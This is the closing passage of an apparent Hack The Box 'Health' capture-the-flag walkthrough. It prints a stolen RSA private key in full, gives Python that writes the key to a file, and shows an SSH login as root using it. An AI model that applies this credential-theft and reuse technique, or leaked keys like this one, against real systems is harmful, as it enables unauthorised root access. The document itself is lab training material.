  "body": "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"
}
```
Now we quickly write the key to a file with Python:

```python
import os

# Key as captured from the JSON body above. The "\n" escapes become real line
# breaks; the "\/" sequences are JSON escapes, not part of the key.
key = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"
key = key.replace("\\/", "/")          # drop the JSON escaping of "/"
with open("id-rsa", "w") as id_rsa:
    id_rsa.write(key)
os.chmod("id-rsa", 0o600)              # ssh refuses keys readable by others
```

After that, replace any remaining “\” with nothing. That leaves us with just the key. Let's test it out!

```text
┌──(kali㉿DESKTOP-FQ305P5)-[~/Documents/HackTheBox/Health]
└─$ ssh root@10.10.11.176 -i id-rsa
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Sep 27 19:14:35 UTC 2022

  System load:  0.03              Processes:           180
  Usage of /:   66.4% of 3.84GB   Users logged in:     1
  Memory usage: 18%               IP address for eth0: 10.10.11.176
  Swap usage:   0%

0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

root@health:~
```